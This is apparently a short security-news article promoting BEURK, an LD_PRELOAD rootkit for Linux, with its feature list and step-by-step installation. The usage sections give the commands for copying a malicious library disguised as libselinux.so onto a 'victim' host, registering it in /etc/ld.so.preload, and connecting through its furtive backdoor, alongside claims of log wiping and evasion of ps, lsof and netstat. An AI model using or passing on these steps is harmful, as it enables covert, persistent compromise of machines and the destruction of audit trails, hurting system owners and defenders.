BEURK - Experimental Unix RootKit

21.08.2017

RootKit

 

BEURK is an userland preload rootkit for GNU/Linux, heavily focused around anti-debugging and anti-detection features, according to N0where.net.

Features

  • Hide attacker files and directories
  • Realtime log cleanup (on utmp/wtmp)
  • Anti process and login detection
  • Bypass unhide, lsof, ps, ldd, netstat analysis
  • Furtive PTY backdoor client

Upcoming features

  • ptrace(2) hooking for anti-debugging
  • libpcap hooking undermines local sniffers
  • PAM backdoor for local privilege escalation

Usage

  • Compile

git clone https://github.com/unix-thrust/beurk.git

cd beurk

make

  • Install

scp libselinux.so [email protected]:/lib/

ssh [email protected] 'echo /lib/libselinux.so >> /etc/ld.so.preload'

  • Done!

./client.py victim_ip:port # connect with furtive backdoor

Dependencies

The following packages are not required in order to build BEURK at the moment:

  • libpcap – to avoid local sniffing
  • libpam – for local PAM backdoor
  • libssl – for encrypted backdoor connection

Example on Debian:

apt-get install libpcap-dev libpam-dev libssl-dev

Installing BEURK

su -

git clone [email protected]:unix-thrust/beurk.git

cd beurk

./build beurk.conf

mv libselinux.so /lib

echo "/lib/libselinux.so" > /etc/ld.so.preload

Would you like to comment on this article?

Share

Latest articles

17.10.2017

Guide for GDPR compliance

In May 2018, the General Data Privacy Regulation (GDPR) will take effect, significantly changing the way organizations process and store data.

21.08.2017

BEURK - Experimental Unix RootKit

BEURK is an user-land preload rootkit for GNU/Linux.

05.07.2017

U.N. survey did not find cybersecurity gaps just in Singapore

50% of countries do not have a cybersecurity strategy at all.

Sign up for our online newsletter!